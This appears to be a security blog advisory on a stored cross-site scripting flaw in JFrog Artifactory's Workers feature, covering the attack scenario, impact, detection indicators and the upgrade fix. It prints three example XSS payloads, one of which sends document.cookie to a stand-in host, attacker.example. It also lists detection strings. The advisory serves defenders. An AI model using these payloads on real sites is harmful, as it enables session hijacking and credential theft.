CVE-2025-14830: High-Risk XSS Flaw in Artifactory Workers Threatens CI/CD Pipeline Integrity

Aegiron 8 mins0

Product: JFrog Artifactory – Workers feature
Vulnerability Type: Improper Neutralization of Input During Web Page Generation (Cross-Site Scripting – XSS)
Affected Versions: >= 7.94.0 and < 7.117.10
Fixed Version: 7.117.10 and later

Risk Overview (at a glance)

  • CVE ID: CVE-2025-14830
  • CWE: CWE-79 (Improper Neutralization of Input During Web Page Generation)
  • CVSS v3.x: Not officially published at the time of writing
  • Practical Severity: High
  • Exploitability: Medium
  • Exploit Availability: No public exploit kit observed; proof-of-concept style payloads are trivial
  • Attack Complexity: Low
  • Privileges Required: Low (authenticated user with access to Workers context)
  • User Interaction: Required (victim must view a crafted page or resource)
  • Impact: Session hijacking, credential theft, UI redirection, unauthorized actions in Artifactory UI

Detailed Description

CVE-2025-14830 is a stored Cross-Site Scripting (XSS) vulnerability in the Workers feature of JFrog Artifactory.
The issue arises when user-supplied input associated with Workers is stored and later rendered in the web UI without proper output encoding or sanitization.

Because the browser interprets this input as executable JavaScript rather than inert text, an attacker can inject scripts that execute in the context of another user’s authenticated session.

This vulnerability is particularly serious due to Artifactory’s role in CI/CD pipelines, release management, and production artifact distribution.

Affected Component – Workers

Artifactory Workers allow users to:

  • Automate repository tasks
  • React to events
  • Process metadata
  • Integrate custom logic into workflows

Certain Worker attributes (such as names, parameters, metadata values, or configuration fields) are:

  1. Accepted as input
  2. Stored by the application
  3. Later displayed in the Artifactory UI

The vulnerability occurs during step 3, where output encoding is missing or insufficient.

Attack Scenario (Step-by-Step)

  1. An attacker has authenticated access to Artifactory with permission to create or modify Workers.
  2. The attacker embeds malicious JavaScript into a Worker-related field.
  3. Artifactory stores this input without neutralizing it.
  4. A privileged user (often an administrator) views the Worker or related UI page.
  5. The injected script executes automatically in the victim’s browser.

This is a persistent attack and does not require repeated attacker interaction.

Impact Analysis

If successfully exploited, an attacker can:

  • Hijack authenticated user sessions
  • Steal cookies, tokens, or CSRF secrets
  • Perform unauthorized actions using the victim’s privileges
  • Modify repositories or permissions
  • Abuse CI/CD pipelines to introduce malicious artifacts
  • Redirect users to phishing pages
  • Establish long-term persistence through additional Workers

In environments where Artifactory is tightly integrated with production systems, the business and security impact can be severe.

Example Malicious Payloads

These payloads illustrate how exploitation typically occurs when output encoding is missing:

<script>fetch('https://attacker.example/log?c='+document.cookie)</script>
"><img src=x onerror="alert('XSS')">
<svg onload="document.location='https://attacker.example'">

If these payloads execute instead of rendering as plain text, the system is vulnerable.

MITRE ATT&CK Mapping

  • Initial Access
    • Exploitation of application functionality
  • Execution
    • JavaScript execution in a trusted browser context
  • Credential Access
    • Browser session and token theft
  • Privilege Escalation
    • Abuse of administrator sessions
  • Persistence
    • Malicious Worker configurations retained across sessions

Detection Guidance

Log Sources to Monitor

  • Artifactory application logs
  • Audit and access logs
  • Worker creation and modification logs
  • Reverse proxy or load balancer logs

Indicators of Compromise

  • HTML or JavaScript tags in Worker names or parameters
  • Suspicious strings such as:
    • <script
    • <svg
    • onerror=
    • onload=
    • javascript:
  • Unexpected outbound HTTP requests initiated from user browsers
  • Unexplained administrative actions following UI access

Detection Rule Examples

SIEM Logic

  • Alert when Worker-related input contains HTML tags or JavaScript keywords
  • Correlate with UI page views by higher-privileged users

WAF / Proxy Logic

  • Inspect POST and PUT requests related to Workers
  • Block or log payloads containing executable HTML or event handlers

Why This Vulnerability Is Important

Artifactory often holds:

  • Release artifacts
  • Proprietary binaries
  • CI/CD credentials
  • API keys and access tokens

A successful XSS attack can bridge the gap between user-level access and full DevOps compromise, making this issue far more dangerous than a typical UI vulnerability.

Patch and Remediation

Vendor Fix

JFrog has resolved this issue by:

  • Applying strict output encoding
  • Improving server-side input handling for Worker-related UI elements

Required Action

  • Upgrade to Artifactory version 7.117.10 or later

Official Patch Source

  • JFrog Artifactory official release and upgrade channels

Compensating Controls (If Immediate Upgrade Is Not Possible)

  • Restrict Worker access to trusted roles only
  • Apply strict Content Security Policy headers
  • Monitor Worker modifications in real time
  • Sanitize inputs at reverse proxy level
  • Enforce session timeouts and least-privilege access

Final Takeaway

CVE-2025-14830 represents a high-impact stored XSS vulnerability in a critical DevOps platform.
While it does not directly enable server-side code execution, the indirect access gained through privileged sessions can lead to full pipeline compromise.

Immediate patching is strongly recommended.

Aegiron

Backed by 11+ years in cybersecurity and incident response, we decode the latest threats shaping today’s digital battlefield. This blog cuts through the noise with clear insights on vulnerabilities, emerging exploits, and the cyber news defenders can’t afford to miss.